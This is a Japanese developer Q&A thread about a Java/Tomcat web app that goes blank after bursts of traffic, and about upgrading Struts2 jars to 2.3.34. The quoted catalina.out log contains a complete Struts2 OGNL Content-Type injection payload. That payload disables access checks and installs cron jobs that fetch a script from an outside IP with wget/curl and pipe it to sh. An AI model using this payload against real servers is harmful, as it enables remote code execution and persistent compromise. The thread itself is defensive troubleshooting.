Q&A
とりあえず,2.3.24でも動いてないソースコードにしかみえないな。→ログ
###前提・実現したいこと
AWSで稼働しているWebアプリケーション(Linux・Java・Tomcat)があります。
私は、本番環境と同様の学習環境を構築して、学習中の初学者です。質問中の至らない点をお許しください。
本番環境と学習環境において、突発的に大量のネットワーク入力があった後、
Webアプリケーションが動作しなくなってしまう、という現象の調査を行っております。
(現象:Webページにアクセスすると、真っ白なページしか表示されない)
別のスレッド(https://teratail.com/questions/97607)で一般的な対策等について質問し、いただいた回答を参考に、
まずは現象前後のcatalina.outを調査してみようと考え、この質問に至ります。
catalina.out(詳細は下記をご参照ください)を見た結果、
Struts2の脆弱性が関係しているのではないか、との結論に至りました。
そこで、Struts2のアップデートを実施すべく、まずはダウンロードしたstruts2-core-2.3.34.jarを
eclipseのWEB-INF/libにコピーしてプロパティから指定してみたところ、
アプリケーションが起動しなくなってしまいました。
類似質問の
https://teratail.com/questions/38790
https://teratail.com/questions/38706
も拝見したのですが、私のスキルでは解決に至りませんでしたため、質問させていただきました。
よろしくお願いいたします。
###発生している問題・エラーメッセージ
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn WARNING: Unable to parse request org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/11 * * * * wget -O - -q http://5.188.87.12/pics/logo.jpg|sh\n*/12 * * * * curl http://5.188.87.12/pics/logo.jpg|sh" | crontab -;wget -O - -q http://5.188.87.12/pics/logo.jpg|sh').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310) at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:188) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127) at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92) at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:84) at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:838) at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:137) at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:218) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:506) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:962) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:445) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1115) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1152) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:622) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:748)
###WEB-INF/libの内容(サーバ)
antlr-2.7.2.jar aopalliance-1.0.jar asm-3.3.jar asm-commons-3.3.jar asm-tree-3.3.jar commons-beanutils-1.8.0.jar commons-collections-3.1.jar commons-fileupload-1.3.1.jar commons-io-2.2.jar commons-lang-2.4.jar commons-lang3-3.2.jar commons-logging-1.1.3.jar ezmorph-1.0.6.jar freemarker-2.3.22.jar javassist-3.11.0.GA.jar json-lib-2.3-jdk15.jar log4j-api-2.2.jar log4j-core-2.2.jar mail.jar mybatis-3.3.0.jar mybatis-spring-1.2.3.jar ognl-3.0.6.jar poi-3.13-20150929.jar poi-ooxml-3.13-20150929.jar poi-ooxml-schemas-3.13-20150929.jar spring-aop-4.2.1.RELEASE.jar spring-aspects-4.2.1.RELEASE.jar spring-beans-4.2.1.RELEASE.jar spring-context-4.2.1.RELEASE.jar spring-context-support-4.2.1.RELEASE.jar spring-core-4.2.1.RELEASE.jar spring-expression-4.2.1.RELEASE.jar spring-jdbc-4.2.1.RELEASE.jar spring-orm-4.2.1.RELEASE.jar spring-tx-4.2.1.RELEASE.jar spring-web-4.2.1.RELEASE.jar spring-webmvc-4.2.1.RELEASE.jar struts2-core-2.3.24.jar struts2-json-plugin-2.3.24.jar struts2-spring-plugin-2.3.24.jar xmlbeans-2.6.0.jar xwork-core-2.3.24.jar
###試したこと
struts2-core-2.3.34.jarをeclipseのWEB-INF/libにコピーしてプロパティで指定
###補足情報(言語/FW/ツール等のバージョンなど)
WebアプリケーションはJavaを使用しております。
回答1件
0
ベストアンサー
Struts2-coreだけでなく、関連する Struts2から始まるjarファイルとxwork-coreをすべて2.3.34に揃えなければ動作しません。
Struts2に関しては依存関係にあるライブラリがいくつかありますし、他にも導入されているライブラリやフレームワークがいくつかありますので、mavenを利用してバージョンを修正したほうが良いでしょうか。
また、記載されているログについては、いわゆるStruts2の脆弱性を突こうとしたリクエストを受信したが、内容を処理できないものであったことによるものです。
投稿2017/11/27 17:08
総合スコア12011
A-pZ 様
ご回答、ありがとうございます。
ご回答の内容を基に、以下のファイルを更新したところ、正常に動作いたしました。
Struts2の脆弱性についてもログの内容をご説明いただき、ありがとうございました。
大変参考になりました。
(更新したファイル)
asm-3.3.jar
asm-commons-3.3.jar
asm-tree-3.3.jar
commons-fileupload-1.3.2.jar
commons-io-2.2.jar
commons-lang3-3.2.jar
commons-logging-1.1.3.jar
freemarker-2.3.22.jar
javassist-3.11.0.GA.jar
ognl-3.0.21.jar
struts2-core-2.3.34.jar
xwork-core-2.3.34.jar
d(・ω・
あなたの回答
tips
プレビュー
